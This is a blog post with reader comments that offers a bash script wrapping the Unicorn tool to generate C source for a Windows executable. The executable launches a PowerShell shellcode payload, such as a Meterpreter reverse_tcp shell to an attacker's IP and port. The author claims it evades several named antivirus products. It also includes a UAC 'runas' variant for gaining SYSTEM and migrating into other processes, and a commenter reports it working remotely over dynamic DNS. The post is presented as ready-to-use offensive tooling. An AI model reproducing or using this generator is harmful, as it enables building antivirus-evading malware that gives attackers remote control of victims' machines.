Unicorn 2 C source generator

powershell

There is an excellent python script out made available by David Kennedy called the Unicorn; a simple python script that does PowerShell downgrade attack and inject shellcode straight into memory. The project page is here:

https://github.com/trustedsec/unicorn

Direct download is here:

https://github.com/trustedsec/unicorn/raw/master/unicorn.py

The usage is pretty simple, download the python script, save it to your metasploit root directory and execute it, the resulting ASCII output can be fed directly to the target PowerShell.

I have created a little generator that generates a compilable C code out of this so you can compile a nice Win32 PE executable which will get you by most modern AVs (Tested against Kaspersky, MS Essentials, ESET ..) it will only work on Windows 7,8 32/64 bits. I have tried it on XP with PowerShell installed but could not get it to run.

So here is the source for the Unicorn2c generator:

#!/bin/bash
clear
echo '--------------------------------------'
echo ' Unicorn Powershell2C code generator  '
echo 'Works for Vista, Win7, Win8 32/64 bit'
echo '--------------------------------------'
if [ -z "$*" ];then  
echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform' 
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo 'Valid platforms are: nonuac uac' 
exit 0 
fi
case $4 in 
nonuac)
echo 'Generating nonUAC unicorn.c ...' 
python unicorn.py $1 $2 $3  
echo '#include <stdio.h>' > unicorn.c 
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c 
echo '#include <aclapi.h>' >> unicorn.c 
echo '#include <shlobj.h>' >> unicorn.c 
echo '#include <windows.h>' >> unicorn.c 
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c  
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c 
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c 
echo 'FreeConsole();' >> unicorn.c  
echo -n ' ShellExecute( NULL,NULL, "powershell.exe", "' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{11}//' >> unicorn.c
echo -n '",NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c 
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c 
todos unicorn.c 
echo '[*] Exported unicorn.c To compile use cl.exe unicorn.c'
;;

uac)
echo 'Generating UAC  unicorn.c ...'
python unicorn.py $1 $2 $3
echo '#include <stdio.h>' > unicorn.c
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c
echo '#include <windows.h>' >> unicorn.c
echo '#include <aclapi.h>' >> unicorn.c
echo '#include <shlobj.h>' >> unicorn.c
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c
echo 'FreeConsole();' >> unicorn.c
echo -n ' ShellExecute( NULL, "runas", "powershell.exe", "' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{11}//' >> unicorn.c
echo -n '",NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c
todos unicorn.c
echo '[*] Exported unicorn.c To compile use cl.exe unicorn.' 
;;

"")
echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform'
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo 'Valid platforms are: nonuac, uac' 
exit 0 
;;
esac

Save this as an executable shell script in your metasploit root directory and make sure you have the original unicorn.py in the path. Usage is simple, run the shell script with required options. There is a fourth variable there and that being nonuac and uac. The resulting C code is different in the shellexecute function option “runas” (for UAC) and NULL (for nonUAC).

If for example the UAC compiled binary is executed from an elevated command prompt then the shellexecute function loads powershell with same privileges enabling us to GETSYSTEM and migrate to any process. But if a non privileged user runs the UAC binary he gets prompted for credentials, thus there is an option to generate the C code as non-UAC, but from which we wont be able to GETSYSTEM or migrate to other processes then ours.

Compilation is easy, either Visual Studio C++ 2010,2012 express or full, using the Visual Studio Tools command prompt compile for 32bit ! like so:

cl.exe unicorn.c

Sometimes the binary takes a while to spawn a reverse shell on the listener, but this is maybe due to the fact that my system is virtual and I have low memory resources.

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

3 Responses to Unicorn 2 C source generator

  1. dany says:

    really appreciate!!!!thanks bro!!

  2. c3as4r says:

    thanks a lot for this!! It also works perfectly in remote with dynamic DNS instead of IP address!
    Really really good stuff!

  3. Pingback: El Unicornio que evade antivirus | BlueScreenSEC

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s